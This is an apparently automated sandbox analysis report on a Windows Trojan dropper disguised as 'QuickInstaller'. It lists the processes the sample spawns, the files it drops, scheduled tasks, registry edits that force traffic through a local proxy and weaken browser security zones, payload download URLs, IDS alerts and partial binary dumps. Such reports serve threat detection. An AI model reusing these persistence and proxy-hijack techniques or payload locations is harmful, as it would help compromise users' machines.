MD5: dc452e3893e90bc26b0ec26ad95c293a
SHA1: 5ea5bf4463adbe6d528a8b9a5509f25996826a31
SHA256: d88ddccb9c50e46e21613a5a300d1c98b15ed358bff939cbcbe38b15aa103923
SSDeep: 12288:JSxGH4cilArORPW8KiXQ6B4jTKgIX8DzqUsKXgWjtcVe3YvQVB9toRI0zT:ExGYcildOGgc4jGsqUBwWjeeIvGc9P
Size: 728624 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 2015-07-27 11:42:21
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1240
1.tmp.exe:1732
openvpnserv.exe:1768
privoxy.exe:2028
privoxy.exe:596
3.tmp.exe:1772
helloworld.exe:744
2.tmp.exe:1676
jptask.exe:240

The Trojan injects its code into the following process(es):

dc452e3893e90bc26b0ec26ad95c293a.tmp:488

Mutexes

The following mutexes were created/opened:

ShimCacheMutex

File activity

The process %original file name%.exe:1240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-SJ9IE.tmp\dc452e3893e90bc26b0ec26ad95c293a.tmp (7386 bytes)

The process 1.tmp.exe:1732 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Full Cleaner\Full Cleaner.exe (5873 bytes)
%WinDir%\Tasks\Full Cleaner Logon.job (304 bytes)
%WinDir%\Tasks\Full Cleaner.job (304 bytes)

The process 3.tmp.exe:1772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Megasoft Security\config.txt (411 bytes)
%Program Files%\Megasoft Security\privoxy.exe (1652 bytes)
%Program Files%\Megasoft Security\default.action (21 bytes)
%Program Files%\Megasoft Security\default.filter (243 bytes)
%Program Files%\Megasoft Security\mgwz.dll (86 bytes)
%Program Files%\Megasoft Security\jptask.exe (3878 bytes)

The process helloworld.exe:744 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp.exe (242047 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp.exe (107559 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3.tmp.exe (144863 bytes)

The process dc452e3893e90bc26b0ec26ad95c293a.tmp:488 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-GU2O8.tmp\helloworld.exe (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GU2O8.tmp\json_parser.exe (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GU2O8.tmp\_isetup\_shfoldr.dll (23 bytes)

The process 2.tmp.exe:1676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Shortcuts\OpenVPN configuration file directory.lnk (683 bytes)
%Program Files%\OpenVPN\bin\libpkcs11-helper-1.dll (3435 bytes)
%Program Files%\OpenVPN\bin\liblzo2-2.dll (3516 bytes)
%Program Files%\OpenVPN\doc\INSTALL-win32.txt (2 bytes)
%Documents and Settings%\All Users\Desktop\OpenVPN GUI.lnk (756 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Shortcuts\OpenVPN log file directory.lnk (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso5.tmp\UserInfo.dll (6 bytes)
%Program Files%\OpenVPN\sample-config\client.ovpn (3 bytes)
%Program Files%\OpenVPN\doc\openvpn.8.html (6328 bytes)
%Program Files%\OpenVPN\doc\license.txt (27 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Shortcuts\OpenVPN Sample Configuration Files.lnk (720 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\OpenVPN GUI.lnk (768 bytes)
%Program Files%\OpenVPN\bin\ssleay32.dll (11754 bytes)
%Program Files%\OpenVPN\bin\libeay32.dll (34277 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Documentation\OpenVPN HOWTO.url (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso5.tmp\nsExec.dll (8 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Documentation\OpenVPN Manual Page.lnk (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso5.tmp\ns7.tmp (8 bytes)
%Program Files%\OpenVPN\Uninstall.exe (167 bytes)
%Program Files%\OpenVPN\bin\openvpn-gui.exe (10876 bytes)
%Program Files%\OpenVPN\config\README.txt (365 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso5.tmp\System.dll (23 bytes)
%Program Files%\OpenVPN\bin\openvpn.exe (19349 bytes)
%Program Files%\OpenVPN\sample-config\sample.ovpn (3 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Utilities\Generate a static OpenVPN key.lnk (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Documentation\OpenVPN Windows Notes.lnk (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso5.tmp\nsProcess.dll (4 bytes)
%Program Files%\OpenVPN\log\README.txt (143 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Uninstall OpenVPN.lnk (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso5.tmp\ns6.tmp (8 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Documentation\OpenVPN Web Site.url (45 bytes)
%Program Files%\OpenVPN\sample-config\server.ovpn (10 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Documentation\OpenVPN Wiki.url (69 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Documentation\OpenVPN Support.url (80 bytes)
%Program Files%\OpenVPN\bin\openvpnserv.exe (1568 bytes)
%Program Files%\OpenVPN\icon.ico (22 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nso5.tmp\ns7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso5.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso5.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso5.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso5.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso5.tmp\ns6.tmp (0 bytes)

The process jptask.exe:240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\Megasoft Security Uninstaller.job (242 bytes)

Registry activity

The process %original file name%.exe:1240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F FE 8F 99 02 20 9D DD 09 05 CF 4D DE CE 29 46"

The process 1.tmp.exe:1732 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 47 D2 93 C5 78 37 4D 56 B5 A2 7D 5A A0 8A 37"

[HKLM\SOFTWARE\SecureWebChannel]
"channel" = "split24anon4"

The process openvpnserv.exe:1768 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 2C 3B CC 38 46 6A F0 92 DE 07 8F 1B D0 C1 BD"

The process privoxy.exe:2028 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E8 8B F0 EF 4F 82 19 B7 9A 57 07 03 BD 2D FE 12"

The process privoxy.exe:596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 0B 9E 4A 4E D9 8F E8 E8 83 4C 1B DF 09 8B 5A"

The process 3.tmp.exe:1772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 0E 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "127.0.0.1:8118"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 03 00 00 00 0E 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C CD 7B 80 C6 9E F5 3B F6 C8 29 E3 00 45 3C E4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\SecureWebChannel]
"channel" = "split24anon4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyOverride"

The process helloworld.exe:744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "ED 03 88 75 39 CD BE 14 7F E3 14 CB D6 28 8E 57"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process dc452e3893e90bc26b0ec26ad95c293a.tmp:488 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 12 B0 45 F7 F3 7D E7 40 D1 05 16 10 45 5B 9C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process 2.tmp.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso5.tmp\nsProcess.dll,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OpenVPN]
"DisplayVersion" = "2.3.9-I601"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"Path" = "C:\Perl\site\bin;C:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;c:\Program Files\Wireshark;%Program Files%\OpenVPN\bin"

[HKCR\OpenVPNFile\DefaultIcon]
"(Default)" = "%Program Files%\OpenVPN\icon.ico,0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\OpenVPNFile\shell\run]
"(Default)" = "Start OpenVPN on this config file"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OpenVPN]
"DisplayIcon" = "%Program Files%\OpenVPN\icon.ico"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\OpenVPN]
"Priority" = "NORMAL_PRIORITY_CLASS"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OpenVPN]
"UninstallString" = "%Program Files%\OpenVPN\Uninstall.exe"

[HKLM\SOFTWARE\OpenVPN]
"log_dir" = "%Program Files%\OpenVPN\log"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCR\.ovpn]
"(Default)" = "OpenVPNFile"

[HKCR\OpenVPNFile\shell\run\command]
"(Default)" = "%Program Files%\OpenVPN\bin\openvpn.exe --pause-exit --config %1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\OpenVPN]
"config_ext" = "ovpn"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCR\OpenVPNFile\shell]
"(Default)" = "open"

[HKCR\OpenVPNFile\shell\open\command]
"(Default)" = "notepad.exe %1"

[HKLM\SOFTWARE\OpenVPN-GUI]
"disconnect_on_suspend" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 33 62 AB 0E 8B 44 FB B7 E2 4D 05 48 85 10 2B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OpenVPN]
"DisplayName" = "OpenVPN 2.3.9-I601"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\OpenVPN]
"exe_path" = "%Program Files%\OpenVPN\bin\openvpn.exe"
"config_dir" = "%Program Files%\OpenVPN\config"
"(Default)" = "%Program Files%\OpenVPN"

[HKCR\OpenVPNFile]
"(Default)" = "OpenVPN Config File"

[HKLM\SOFTWARE\OpenVPN]
"log_append" = "0"

The process jptask.exe:240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 1C 71 6E 75 8F 55 44 C5 51 CC 68 EE 28 29 42"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "127.0.0.1:8118"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 03 00 00 00 0E 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyOverride"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: QuickInstaller
Product Version: 2.0.0.2
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.0.0.2
File Description: QuickInstaller Setup
Comments: This installation was built with Inno Setup.
Language: Language Neutral

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
d0cd528473753a311f66b377850bebc1

URLs

URL	IP
hxxp://api.wiseinstaller.net/api/get-configs	104.24.113.101
hxxp://api.wiseinstaller.net/api/install-status	104.24.113.101
hxxp://s3-us-west-2.amazonaws.com/151125/helloworld.exe	54.231.184.144
hxxp://s3-us-west-2.amazonaws.com/16opz/160419/gpup_218.exe	54.231.184.144
hxxp://api.mediaconfig.net/index.php/api/updater-status	104.27.181.218
hxxp://swupdate.openvpn.org/community/releases/openvpn-install-2.3.9-I601-i686.exe	104.28.0.12
hxxp://s3-us-west-2.amazonaws.com/16opz/160419/hp_l_1739.exe	54.231.184.144
hxxp://api.wiseinstaller.net/api/offer-status	104.24.113.101
hxxp://httpbin.org/	54.175.222.246
anddogen.com	104.18.44.195

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Executable served from Amazon S3
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /151125/helloworld.exe HTTP/1.1

Host: s3-us-west-2.amazonaws.com

Connection: Keep-Alive

HTTP/1.1 200 OK

x-amz-id-2: X0t 5lLEWTpFAhOv65Kue85iv0PMGaPTFrr YujN9IAXZLNb6fs0rR6MTXEbtkeOrT 3fYw56E8=

x-amz-request-id: F2967CDB92989537

Date: Tue, 19 Apr 2016 23:25:27 GMT

Last-Modified: Mon, 07 Mar 2016 11:26:12 GMT

ETag: "dc77ba37fe8e792e5c6f267e78d768fc"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Content-Length: 31744

Server: AmazonS3
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........>...P..
.P...P.......P...Q...P.......P.......P.......P.......P.Rich..P........
.................PE..L...*b.V.................D...B...............`...
.@.......................................@............................
......y..(............................................................
........w..@............`...............................text....C.....
..D.................. ..`.rdata.......`... ...H..............@[email protected]
[email protected].............
[email protected].................................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..3.].....U...=([email protected].
......u......h.........YY].jXh`[email protected]...`@[email protected]...`@.
[email protected].<.@[email protected][email protected][email protected]...@.
....M........u.j..S...Y.1.....u.j..B...Y......u........y.j......Y...`@
....@....... [email protected];.t.P.....Y.
[email protected]."....I......E......M.PQ.....
YY..e..E..E..}..u.P......(....E......E..7................U...E....8csm
.u*.x..u$.@.= ...t.=!...t.="[email protected].]...h..@....`@.3...
<<< skipped >>>

GET /16opz/160419/gpup_218.exe HTTP/1.1

Host: s3-us-west-2.amazonaws.com

Connection: Keep-Alive

HTTP/1.1 200 OK

x-amz-id-2:  JSGPRPWRv3SrhyaC8a29CMsfHBwAZgKh1uTwQ6iwP1Kk qUOZMW4dIs7wGm23cEFl9jR3iBNzI=

x-amz-request-id: 8558567BA250FE26

Date: Tue, 19 Apr 2016 23:25:28 GMT

Last-Modified: Tue, 19 Apr 2016 13:57:04 GMT

ETag: "8cdf61ee1ff3923fa87d3becab247193"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Content-Length: 834048

Server: AmazonS3
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........QRl.0<?.
0<?.0<?.a.?.0<?.a.?30<?{..?.0<?.a.?.0<?{..?.0<?.0
=?)0<?{..?.0<?{..?.0<?...?.0<?...?.0<?Rich.0<?......
..................PE..L...b..W........................................
..@.......................... ............@...........................
......T)..............................................................
[email protected]...<..
......................... ..`.rdata..$u.......v..................@..@.
data... G...@[email protected].........
.....@[email protected]...............:[email protected].....................
......................................................................
......................................................................
......................................................................
......................................................................
...................U....VL...*..h..K..Sw..Y].U....VL...*..h..K..9w..Y]
.U....VL...*..h..K...w..Y].U..j...VL...*..].U..j...VL...*..].U..j...VL
...*..].U..j...VL...*..].U..Q3..E...].U..Q3..E...].U..Q3..E...].U..Q3.
.E...]...........h0.K...v..Y.....U...u...v..Y].U....@.... @L.3..E.Sj..
....YP.....Y........'......d.................Y.......u.h..K.......P...
.......4..h....h.TL.j...x.K...........h..K.......P..4..YY..t.h..K.h.TL
..!...YY..h..K.h.TL......YY.....P......P..3..YY..........w..P.....
<<< skipped >>>

GET /151125/helloworld.exe HTTP/1.1

Host: s3-us-west-2.amazonaws.com

Connection: Keep-Alive

HTTP/1.1 200 OK

x-amz-id-2: 1VJt/UksMWQXThxi 0dlLe wu5V7L10D15/qvhxv8uaLk4YQZcXUMm1MMdZ1ZQTp3soyOpz2VMk=

x-amz-request-id: 9A4E15CDAB5D3844

Date: Tue, 19 Apr 2016 23:25:35 GMT

Last-Modified: Mon, 07 Mar 2016 11:26:12 GMT

ETag: "dc77ba37fe8e792e5c6f267e78d768fc"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Content-Length: 31744

Server: AmazonS3
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........>...P..
.P...P.......P...Q...P.......P.......P.......P.......P.Rich..P........
.................PE..L...*b.V.................D...B...............`...
.@.......................................@............................
......y..(............................................................
........w..@............`...............................text....C.....
..D.................. ..`.rdata.......`... ...H..............@[email protected]
[email protected].............
[email protected].................................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..3.].....U...=([email protected].
......u......h.........YY].jXh`[email protected]...`@[email protected]...`@.
[email protected].<.@[email protected][email protected][email protected]...@.
....M........u.j..S...Y.1.....u.j..B...Y......u........y.j......Y...`@
....@....... [email protected];.t.P.....Y.
[email protected]."....I......E......M.PQ.....
YY..e..E..E..}..u.P......(....E......E..7................U...E....8csm
.u*.x..u$.@.= ...t.=!...t.="[email protected].]...h..@....`@.3...
<<< skipped >>>

GET /16opz/160419/hp_l_1739.exe HTTP/1.1

Host: s3-us-west-2.amazonaws.com

Connection: Keep-Alive

HTTP/1.1 200 OK

x-amz-id-2: xw14ZcZeAHd4Wn7I0lqlkyuS6sVXqjTjPl0NJNdZgN II7W2Uy8/RQhrc5dRxrGIc57Wr38axSg=

x-amz-request-id: C47622701CC82058

Date: Tue, 19 Apr 2016 23:25:37 GMT

Last-Modified: Tue, 19 Apr 2016 13:57:05 GMT

ETag: "2b8834dcf847d4b17855ffdd8251f711"

Accept-Ranges: bytes

Content-Type: application/octet-stream
